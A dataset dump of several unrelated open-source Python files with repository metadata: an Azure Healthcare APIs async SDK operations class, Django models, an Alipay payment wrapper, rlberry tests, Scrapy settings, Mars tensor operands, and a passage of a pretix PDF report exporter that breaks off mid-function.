src/healthcareapis/azext_healthcareapis/vendored_sdks/healthcareapis/aio/operations/_workspace_private_link_resources_operations.py
|
Caoxuyang/azure-cli-extensions
|
d2011261f29033cb31a1064256727d87049ab423
|
[
"MIT"
] | null | null | null |
src/healthcareapis/azext_healthcareapis/vendored_sdks/healthcareapis/aio/operations/_workspace_private_link_resources_operations.py
|
Caoxuyang/azure-cli-extensions
|
d2011261f29033cb31a1064256727d87049ab423
|
[
"MIT"
] | 1
|
2022-02-14T21:43:29.000Z
|
2022-02-14T21:43:29.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class WorkspacePrivateLinkResourcesOperations:
"""WorkspacePrivateLinkResourcesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.healthcareapis.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list_by_workspace(
self,
resource_group_name: str,
workspace_name: str,
**kwargs
) -> AsyncIterable["models.PrivateLinkResourceListResultDescription"]:
"""Gets the private link resources that need to be created for a workspace.
:param resource_group_name: The name of the resource group that contains the service instance.
:type resource_group_name: str
:param workspace_name: The name of workspace resource.
:type workspace_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PrivateLinkResourceListResultDescription or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.healthcareapis.models.PrivateLinkResourceListResultDescription]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.PrivateLinkResourceListResultDescription"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-11-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_workspace.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'workspaceName': self._serialize.url("workspace_name", workspace_name, 'str', max_length=24, min_length=3),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('PrivateLinkResourceListResultDescription', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(models.ErrorDetails, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_workspace.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.HealthcareApis/workspaces/{workspaceName}/privateLinkResources'} # type: ignore
async def get(
self,
resource_group_name: str,
workspace_name: str,
group_name: str,
**kwargs
) -> "models.PrivateLinkResourceDescription":
"""Gets a private link resource that need to be created for a workspace.
:param resource_group_name: The name of the resource group that contains the service instance.
:type resource_group_name: str
:param workspace_name: The name of workspace resource.
:type workspace_name: str
:param group_name: The name of the private link resource group.
:type group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: PrivateLinkResourceDescription, or the result of cls(response)
:rtype: ~azure.mgmt.healthcareapis.models.PrivateLinkResourceDescription
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.PrivateLinkResourceDescription"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-11-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'workspaceName': self._serialize.url("workspace_name", workspace_name, 'str', max_length=24, min_length=3),
'groupName': self._serialize.url("group_name", group_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.ErrorDetails, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('PrivateLinkResourceDescription', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.HealthcareApis/workspaces/{workspaceName}/privateLinkResources/{groupName}'} # type: ignore
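# A hedged usage sketch, not generated code: these operations are normally reached
# through the service's async management client rather than instantiated directly.
# The credential import and the `workspace_private_link_resources` attribute name
# are assumptions about the surrounding packages; adjust them to whatever the
# vendored SDK actually exposes.
#
#     from azure.identity.aio import DefaultAzureCredential
#
#     async def dump_private_link_resources(client):
#         # `client.workspace_private_link_resources` is assumed to be an instance
#         # of the operations class defined above.
#         async for resource in client.workspace_private_link_resources.list_by_workspace(
#                 "my-resource-group", "my-workspace"):
#             print(resource.name)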
| 50.646409
| 209
| 0.675794
|
c887863553b4a2162ebf12ed95324870669453d7
| 482
|
py
|
Python
|
touroute/tourouteapp/models.py
|
oscarlamasrios/toroute
|
5b00c0f606f438229e7857f25a23c4d51ff34293
|
[
"Apache-2.0"
] | null | null | null |
touroute/tourouteapp/models.py
|
oscarlamasrios/toroute
|
5b00c0f606f438229e7857f25a23c4d51ff34293
|
[
"Apache-2.0"
] | null | null | null |
touroute/tourouteapp/models.py
|
oscarlamasrios/toroute
|
5b00c0f606f438229e7857f25a23c4d51ff34293
|
[
"Apache-2.0"
] | null | null | null |
from django.db import models
# Create your models here.
class Route(models.Model):
    date = models.DateField(auto_now=False, auto_now_add=True, editable=False)
class Place(models.Model):
name = models.CharField(max_length=30)
lat = models.FloatField()
lon = models.FloatField()
identifier = models.CharField(max_length=30)
class RP(models.Model):
    route_id = models.ForeignKey(Route, on_delete=models.CASCADE)
    place_id = models.ForeignKey(Place, on_delete=models.CASCADE)
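# Hedged usage sketch (Django shell or a view), assuming the app is installed and
# migrated; the concrete place data is illustrative only.
#
#     route = Route.objects.create()
#     place = Place.objects.create(name='Plaza Mayor', lat=40.4155, lon=-3.7074,
#                                  identifier='plaza-mayor')
#     RP.objects.create(route_id=route, place_id=place)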
| 30.125
| 75
| 0.773859
|
9114c8347cee48ea6ff0dba61b406d77bf3e6759
| 2,930
|
py
|
Python
|
third_part/alipay_dual/alipay_api.py
|
wangdiwen/Alipay_Python_API
|
b5821ffc9f99b8fb4b22c2bf956ac704571524d5
|
[
"MIT"
] | 15
|
2015-01-13T13:55:32.000Z
|
2021-05-16T03:01:50.000Z
|
third_part/alipay_dual/alipay_api.py
|
wangdiwen/Alipay_Python_API
|
b5821ffc9f99b8fb4b22c2bf956ac704571524d5
|
[
"MIT"
] | null | null | null |
third_part/alipay_dual/alipay_api.py
|
wangdiwen/Alipay_Python_API
|
b5821ffc9f99b8fb4b22c2bf956ac704571524d5
|
[
"MIT"
] | 2
|
2015-04-15T16:48:21.000Z
|
2015-08-23T03:24:37.000Z
|
#!/usr/bin/env python
#coding=utf-8
# Note:
# Alipay dual-function API
from alipay_config import *
from alipay_submit import *
from alipay_notify import *
class Alipay_API:
payment_type = "1" # 支付类型
return_url = "http://192.168.1.199:8000/dual/return" # 页面跳转同步通知页面路径
notify_url = "http://192.168.1.199:8000/dual/notify" # 服务器异步通知页面路径
seller_email = '' # 卖家支付宝帐户
anti_phishing_key = "" # 防钓鱼时间戳
exter_invoke_ip = "" # 客户端的IP地址
alipay_config = ''
def __init__(self):
alipay_config = Alipay_Config()
self.seller_email = alipay_config.seller_email
self.partner = alipay_config.partner
self.key = alipay_config.key
self.sign_type = alipay_config.sign_type
self.input_charset = alipay_config.input_charset
self.cacert = alipay_config.cacert
self.transport = alipay_config.transport
    # out_trade_no: merchant order number; must be unique in the merchant site's order system, required
    # subject: order name
    # price: payment amount
    # quantity: item quantity, required; recommended to keep it at 1 so one trade represents one order rather than one purchased item
    # logistics_fee: shipping fee
    # logistics_type: shipping type, required; one of EXPRESS (courier), POST (surface mail), EMS
    # logistics_payment: shipping payment method, required; SELLER_PAY (seller pays shipping) or BUYER_PAY (buyer pays shipping)
    # body: order description
    # show_url: product display URL; must be a full path starting with http://
    # receive_name: recipient name
    # receive_address: recipient address
    # receive_zip: recipient postal code
    # receive_phone: recipient telephone number
    # receive_mobile: recipient mobile number
def alipay_submit(self, out_trade_no, subject, price, \
quantity, logistics_fee, logistics_type, logistics_payment, \
body, show_url, \
receive_name, receive_address, receive_zip, receive_phone, receive_mobile):
parameter = {
'service': "trade_create_by_buyer",
'partner': self.partner,
'payment_type': Alipay_API.payment_type,
'notify_url': Alipay_API.notify_url,
'return_url': Alipay_API.return_url,
'seller_email': self.seller_email,
'out_trade_no': out_trade_no,
'subject': subject,
'price': price,
'quantity': quantity,
'logistics_fee': logistics_fee,
'logistics_type': logistics_type,
'logistics_payment': logistics_payment,
'body': body,
'show_url': show_url,
'receive_name': receive_name,
'receive_address': receive_address,
'receive_zip': receive_zip,
'receive_phone': receive_phone,
'receive_mobile': receive_mobile,
'_input_charset': self.input_charset,
}
submit = AlipaySubmit()
        html_text = submit.buildRequestForm(parameter, 'get', '确定')  # '确定' = "Confirm", the submit button label
return html_text
def get_notify(self):
notify = AlipayNotify()
return notify.verifyReturn() # True/False
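# Usage sketch (illustration only, not part of the original module; all order data below
# is made up): building the payment-form HTML for a single-item order and checking an
# incoming notification.
def _example_usage():
    api = Alipay_API()
    html = api.alipay_submit(
        '20150101000001', 'Sample item', '10.00',
        '1', '0.00', 'EXPRESS', 'SELLER_PAY',
        'Sample order description', 'http://example.com/item',
        'Zhang San', 'Example Road 1', '100000', '010-00000000', '13800000000')
    verified = api.get_notify()  # True/False once Alipay calls back
    return html, verified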
| 34.069767
| 103
| 0.606826
|
6428d9379d8adf54673630e85f9714cca0aa2eee
| 1,014
|
py
|
Python
|
rlberry/agents/tests/test_torch_models.py
|
antoine-moulin/rlberry
|
676af9d1bb9094a6790a9aa3ff7e67b13584a183
|
[
"MIT"
] | null | null | null |
rlberry/agents/tests/test_torch_models.py
|
antoine-moulin/rlberry
|
676af9d1bb9094a6790a9aa3ff7e67b13584a183
|
[
"MIT"
] | null | null | null |
rlberry/agents/tests/test_torch_models.py
|
antoine-moulin/rlberry
|
676af9d1bb9094a6790a9aa3ff7e67b13584a183
|
[
"MIT"
] | null | null | null |
"""
TODO: Test attention modules
"""
import torch
from rlberry.agents.utils.torch_models import MultiLayerPerceptron
from rlberry.agents.utils.torch_models import ConvolutionalNetwork
from rlberry.agents.utils.torch_attention_models import EgoAttention
from rlberry.agents.utils.torch_attention_models import SelfAttention
def test_mlp():
model = MultiLayerPerceptron(in_size=5,
layer_sizes=[10, 10, 10],
out_size=10,
reshape=False)
x = torch.rand(1, 5)
y = model.forward(x)
assert y.shape[1] == 10
def test_cnn():
model = ConvolutionalNetwork(in_channels=10,
in_height=20,
in_width=30,
out_size=15)
x = torch.rand(1, 10, 20, 30)
y = model.forward(x)
assert y.shape[1] == 15
def test_ego_attention():
_ = EgoAttention()
def test_self_attention():
_ = SelfAttention()
| 26.684211
| 69
| 0.591716
|
af77dfc9880587e24d4a58108ecae5b3ca7b9a3a
| 3,134
|
py
|
Python
|
爬蟲/cpe_crawler/cpe_crawler/settings.py
|
LuckyPigeon/CPE_Previous_Questions
|
14005407c52922dea28e861e8f591d74da3c3df5
|
[
"MIT"
] | 26
|
2020-10-08T02:44:20.000Z
|
2022-03-25T09:59:31.000Z
|
爬蟲/cpe_crawler/cpe_crawler/settings.py
|
LuckyPigeon/CPE_Previous_Questions
|
14005407c52922dea28e861e8f591d74da3c3df5
|
[
"MIT"
] | 61
|
2020-10-08T17:03:53.000Z
|
2021-06-17T01:05:51.000Z
|
爬蟲/cpe_crawler/cpe_crawler/settings.py
|
LuckyPigeon/CPE_Previous_Questions
|
14005407c52922dea28e861e8f591d74da3c3df5
|
[
"MIT"
] | 27
|
2020-10-04T05:30:23.000Z
|
2021-08-21T15:39:58.000Z
|
# -*- coding: utf-8 -*-
# Scrapy settings for cpe_crawler project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# https://docs.scrapy.org/en/latest/topics/settings.html
# https://docs.scrapy.org/en/latest/topics/downloader-middleware.html
# https://docs.scrapy.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'cpe_crawler'
SPIDER_MODULES = ['cpe_crawler.spiders']
NEWSPIDER_MODULE = 'cpe_crawler.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'cpe_crawler (+http://www.yourdomain.com)'
# Obey robots.txt rules
ROBOTSTXT_OBEY = True
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See https://docs.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See https://docs.scrapy.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'cpe_crawler.middlewares.CpeCrawlerSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'cpe_crawler.middlewares.CpeCrawlerDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See https://docs.scrapy.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See https://docs.scrapy.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
# 'cpe_crawler.pipelines.CpeCrawlerPipeline': 300,
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://docs.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
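# Sketch (not part of the original settings): individual spiders can override these
# project-wide values through Scrapy's custom_settings class attribute, e.g. in a
# hypothetical spider module:
#
# class CPESpider(scrapy.Spider):
#     name = "cpe"
#     custom_settings = {"DOWNLOAD_DELAY": 1, "AUTOTHROTTLE_ENABLED": True}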
| 34.43956
| 103
| 0.776962
|
3597b51de07f524891d592950ce7c131ef6a7588
| 72
|
py
|
Python
|
cheeta_jwt/exception/__init__.py
|
mory0tiki/CG-falcon-jwt
|
1117a031fa0809f0e18c9bf64915c49c133f78b3
|
[
"MIT"
] | 1
|
2019-08-19T06:40:29.000Z
|
2019-08-19T06:40:29.000Z
|
cheeta_jwt/exception/__init__.py
|
mory0tiki/CG-falcon-jwt
|
1117a031fa0809f0e18c9bf64915c49c133f78b3
|
[
"MIT"
] | null | null | null |
cheeta_jwt/exception/__init__.py
|
mory0tiki/CG-falcon-jwt
|
1117a031fa0809f0e18c9bf64915c49c133f78b3
|
[
"MIT"
] | 1
|
2019-08-15T09:45:40.000Z
|
2019-08-15T09:45:40.000Z
|
from cheeta_jwt.exception.validator_exception import ValidatorException
| 36
| 71
| 0.916667
|
a86944fa32a1615a80a079d7c549ddbe68217445
| 3,788
|
py
|
Python
|
mars/tensor/operands.py
|
HarshCasper/mars
|
4c12c968414d666c7a10f497bc22de90376b1932
|
[
"Apache-2.0"
] | 2
|
2019-03-29T04:11:10.000Z
|
2020-07-08T10:19:54.000Z
|
mars/tensor/operands.py
|
HarshCasper/mars
|
4c12c968414d666c7a10f497bc22de90376b1932
|
[
"Apache-2.0"
] | null | null | null |
mars/tensor/operands.py
|
HarshCasper/mars
|
4c12c968414d666c7a10f497bc22de90376b1932
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 1999-2020 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ..serialize import DataTypeField
from ..operands import Operand, TileableOperandMixin, HasInput, ShuffleProxy, MapReduceOperand, \
Fuse, OutputType
from ..utils import calc_nsplits
class TensorOperandMixin(TileableOperandMixin):
__slots__ = ()
_op_module_ = 'tensor'
_output_type_ = OutputType.tensor
def new_tensors(self, inputs, shape=None, dtype=None, order=None, chunks=None, nsplits=None,
output_limit=None, kws=None, **kw):
return self.new_tileables(inputs, shape=shape, chunks=chunks, nsplits=nsplits,
output_limit=output_limit, kws=kws, dtype=dtype, order=order, **kw)
def new_tensor(self, inputs, shape, dtype=None, order=None, **kw):
if getattr(self, 'output_limit') != 1:
raise TypeError('cannot new tensor with more than 1 outputs')
return self.new_tensors(inputs, shape=shape, dtype=dtype, order=order, **kw)[0]
@classmethod
def concat_tileable_chunks(cls, tileable):
from .merge.concatenate import TensorConcatenate
tensor = tileable
assert not tensor.is_coarse()
op = TensorConcatenate(dtype=tensor.dtype)
chunk = TensorConcatenate(dtype=tensor.dtype).new_chunk(
tensor.chunks, shape=tensor.shape, index=(0,) * tileable.ndim)
return op.new_tensor([tensor], tensor.shape, chunks=[chunk],
nsplits=tuple((s,) for s in tensor.shape))
@classmethod
def create_tileable_from_chunks(cls, chunks, inputs=None, **kw):
chunk_idx_to_shape = {c.index: c.shape for c in chunks}
nsplits = calc_nsplits(chunk_idx_to_shape)
shape = tuple(sum(ns) for ns in nsplits)
op = chunks[0].op.copy().reset_key()
return op.new_tensor(inputs, shape=shape, chunks=chunks,
nsplits=nsplits, dtype=chunks[0].dtype, **kw)
def get_fuse_op_cls(self, _):
from .fuse import TensorFuseChunk
return TensorFuseChunk
class TensorOperand(Operand):
_output_type_ = OutputType.tensor
_dtype = DataTypeField('dtype')
@property
def dtype(self):
return getattr(self, '_dtype', None)
class TensorHasInput(HasInput):
_output_type_ = OutputType.tensor
_dtype = DataTypeField('dtype')
@property
def dtype(self):
return getattr(self, '_dtype', None)
class TensorShuffleProxy(ShuffleProxy, TensorOperandMixin):
_output_type_ = OutputType.tensor
_dtype = DataTypeField('dtype')
def __init__(self, dtype=None, **kwargs):
kwargs['_dtype'] = kwargs.get('_dtype', dtype)
super().__init__(**kwargs)
@property
def dtype(self):
return getattr(self, '_dtype', None)
@classmethod
def execute(cls, ctx, op):
pass
class TensorMapReduceOperand(MapReduceOperand):
_output_type_ = OutputType.tensor
_dtype = DataTypeField('dtype')
@property
def dtype(self):
return getattr(self, '_dtype', None)
class TensorFuse(Fuse):
_output_type_ = OutputType.tensor
_dtype = DataTypeField('dtype')
@property
def dtype(self):
return getattr(self, '_dtype', None)
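# Sketch (not part of this module): a concrete operand typically combines TensorOperand
# (or TensorHasInput) with TensorOperandMixin and calls new_tensor() to build its output,
# roughly like the hypothetical no-op below (real operands also register an _op_type_):
#
# class TensorNoop(TensorOperand, TensorOperandMixin):
#     def __call__(self, t):
#         return self.new_tensor([t], shape=t.shape, dtype=t.dtype, order=t.order)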
| 32.93913
| 101
| 0.67661
|
dc4e2504328cd3f20a74b188d8a5f12a9485453d
| 24,170
|
py
|
Python
|
src/pretix/plugins/reports/exporters.py
|
fridtjof/pretix
|
b9474675896d5eb6da57fdecc886c287ee4bd27f
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
src/pretix/plugins/reports/exporters.py
|
fridtjof/pretix
|
b9474675896d5eb6da57fdecc886c287ee4bd27f
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
src/pretix/plugins/reports/exporters.py
|
fridtjof/pretix
|
b9474675896d5eb6da57fdecc886c287ee4bd27f
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
import tempfile
from collections import OrderedDict, defaultdict
from decimal import Decimal
import pytz
from dateutil.parser import parse
from django import forms
from django.conf import settings
from django.contrib.staticfiles import finders
from django.db import models
from django.db.models import Max, OuterRef, Subquery, Sum
from django.template.defaultfilters import floatformat
from django.utils.formats import date_format, localize
from django.utils.timezone import get_current_timezone, now
from django.utils.translation import gettext as _, gettext_lazy, pgettext
from reportlab.lib import colors
from reportlab.platypus import PageBreak
from pretix.base.decimal import round_decimal
from pretix.base.exporter import BaseExporter, ListExporter
from pretix.base.models import Order, OrderPosition
from pretix.base.models.event import SubEvent
from pretix.base.models.orders import OrderFee, OrderPayment
from pretix.base.services.stats import order_overview
from pretix.control.forms.filter import OverviewFilterForm
class ReportlabExportMixin:
multiBuild = False # noqa
@property
def pagesize(self):
from reportlab.lib import pagesizes
return pagesizes.portrait(pagesizes.A4)
def render(self, form_data):
self.form_data = form_data
return 'report-%s.pdf' % self.event.slug, 'application/pdf', self.create(form_data)
def get_filename(self):
tz = pytz.timezone(self.event.settings.timezone)
return "%s-%s.pdf" % (self.name, now().astimezone(tz).strftime("%Y-%m-%d-%H-%M-%S"))
@staticmethod
def register_fonts():
from reportlab.pdfbase import pdfmetrics
from reportlab.pdfbase.ttfonts import TTFont
pdfmetrics.registerFont(TTFont('OpenSans', finders.find('fonts/OpenSans-Regular.ttf')))
pdfmetrics.registerFont(TTFont('OpenSansIt', finders.find('fonts/OpenSans-Italic.ttf')))
pdfmetrics.registerFont(TTFont('OpenSansBd', finders.find('fonts/OpenSans-Bold.ttf')))
def get_doc_template(self):
from reportlab.platypus import BaseDocTemplate
return BaseDocTemplate
def create(self, form_data):
from reportlab.lib.units import mm
from reportlab.platypus import PageTemplate
with tempfile.NamedTemporaryFile(suffix=".pdf") as f:
Report.register_fonts()
doc = self.get_doc_template()(f.name, pagesize=self.pagesize,
leftMargin=15 * mm,
rightMargin=15 * mm,
topMargin=20 * mm,
bottomMargin=15 * mm)
doc.addPageTemplates([
PageTemplate(id='All', frames=self.get_frames(doc), onPage=self.on_page, pagesize=self.pagesize)
])
if self.multiBuild:
doc.multiBuild(self.get_story(doc, form_data))
else:
doc.build(self.get_story(doc, form_data))
f.seek(0)
return f.read()
def get_frames(self, doc):
from reportlab.platypus import Frame
self.frame = Frame(doc.leftMargin, doc.bottomMargin,
doc.width,
doc.height,
leftPadding=0,
rightPadding=0,
topPadding=0,
bottomPadding=0,
id='normal')
return [self.frame]
def get_story(self, doc, form_data):
return []
def get_style(self):
from reportlab.lib.styles import getSampleStyleSheet
styles = getSampleStyleSheet()
style = styles["Normal"]
style.fontName = 'OpenSans'
return style
def on_page(self, canvas, doc):
canvas.saveState()
self.page_footer(canvas, doc)
self.page_header(canvas, doc)
canvas.restoreState()
def page_footer(self, canvas, doc):
from reportlab.lib.units import mm
tz = get_current_timezone()
canvas.setFont('OpenSans', 8)
canvas.drawString(15 * mm, 10 * mm, _("Page %d") % (doc.page,))
canvas.drawRightString(self.pagesize[0] - 15 * mm, 10 * mm,
_("Created: %s") % now().astimezone(tz).strftime("%d.%m.%Y %H:%M:%S"))
def get_right_header_string(self):
return settings.PRETIX_INSTANCE_NAME
def get_left_header_string(self):
if self.event.has_subevents:
return "%s – %s" % (self.event.organizer.name, self.event.name)
else:
return "%s – %s – %s" % (self.event.organizer.name, self.event.name,
self.event.get_date_range_display())
def page_header(self, canvas, doc):
from reportlab.lib.units import mm
canvas.setFont('OpenSans', 10)
canvas.drawString(15 * mm, self.pagesize[1] - 15 * mm, self.get_left_header_string())
canvas.drawRightString(self.pagesize[0] - 15 * mm, self.pagesize[1] - 15 * mm,
self.get_right_header_string())
canvas.setStrokeColorRGB(0, 0, 0)
canvas.line(15 * mm, self.pagesize[1] - 17 * mm,
self.pagesize[0] - 15 * mm, self.pagesize[1] - 17 * mm)
class Report(ReportlabExportMixin, BaseExporter):
name = "report"
def verbose_name(self) -> str:
raise NotImplementedError()
def identifier(self) -> str:
raise NotImplementedError()
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
class OverviewReport(Report):
name = "overview"
identifier = 'pdfreport'
verbose_name = gettext_lazy('Order overview (PDF)')
@property
def pagesize(self):
from reportlab.lib import pagesizes
return pagesizes.landscape(pagesizes.A4)
def get_story(self, doc, form_data):
if form_data.get('date_from'):
form_data['date_from'] = parse(form_data['date_from'])
if form_data.get('date_until'):
form_data['date_until'] = parse(form_data['date_until'])
story = self._table_story(doc, form_data)
if self.event.tax_rules.exists():
story += [PageBreak()]
story += self._table_story(doc, form_data, net=True)
return story
def _table_story(self, doc, form_data, net=False):
from reportlab.lib.units import mm
from reportlab.platypus import Paragraph, Spacer, Table, TableStyle
headlinestyle = self.get_style()
headlinestyle.fontSize = 15
headlinestyle.fontName = 'OpenSansBd'
colwidths = [
a * doc.width for a in (.33, 0.05, .075, 0.05, .075, 0.05, .075, 0.05, .075, 0.05, .075)
]
tstyledata = [
('SPAN', (1, 0), (2, 0)),
('SPAN', (3, 0), (4, 0)),
('SPAN', (5, 0), (-1, 0)),
('SPAN', (5, 1), (6, 1)),
('SPAN', (7, 1), (8, 1)),
('SPAN', (9, 1), (10, 1)),
('ALIGN', (0, 0), (-1, 1), 'CENTER'),
('ALIGN', (1, 2), (-1, -1), 'RIGHT'),
('VALIGN', (0, 0), (-1, -1), 'MIDDLE'),
('FONTNAME', (0, 0), (-1, 1), 'OpenSansBd'),
('FONTNAME', (0, -1), (-1, -1), 'OpenSansBd'),
('FONTSIZE', (0, 0), (-1, -1), 9),
('LINEBEFORE', (1, 0), (1, -1), 1, colors.lightgrey),
('LINEBEFORE', (3, 0), (3, -1), 1, colors.lightgrey),
('LINEBEFORE', (5, 0), (5, -1), 1, colors.lightgrey),
('LINEBEFORE', (7, 1), (7, -1), 1, colors.lightgrey),
('LINEBEFORE', (9, 1), (9, -1), 1, colors.lightgrey),
]
story = [
Paragraph(_('Orders by product') + ' ' + (_('(excl. taxes)') if net else _('(incl. taxes)')), headlinestyle),
Spacer(1, 5 * mm)
]
if form_data.get('date_axis'):
story += [
Paragraph(_('{axis} between {start} and {end}').format(
axis=dict(OverviewFilterForm(event=self.event).fields['date_axis'].choices)[form_data.get('date_axis')],
start=date_format(form_data.get('date_from'), 'SHORT_DATE_FORMAT') if form_data.get('date_from') else '–',
end=date_format(form_data.get('date_until'), 'SHORT_DATE_FORMAT') if form_data.get('date_until') else '–',
), self.get_style()),
Spacer(1, 5 * mm)
]
if form_data.get('subevent'):
try:
subevent = self.event.subevents.get(pk=self.form_data.get('subevent'))
except SubEvent.DoesNotExist:
subevent = self.form_data.get('subevent')
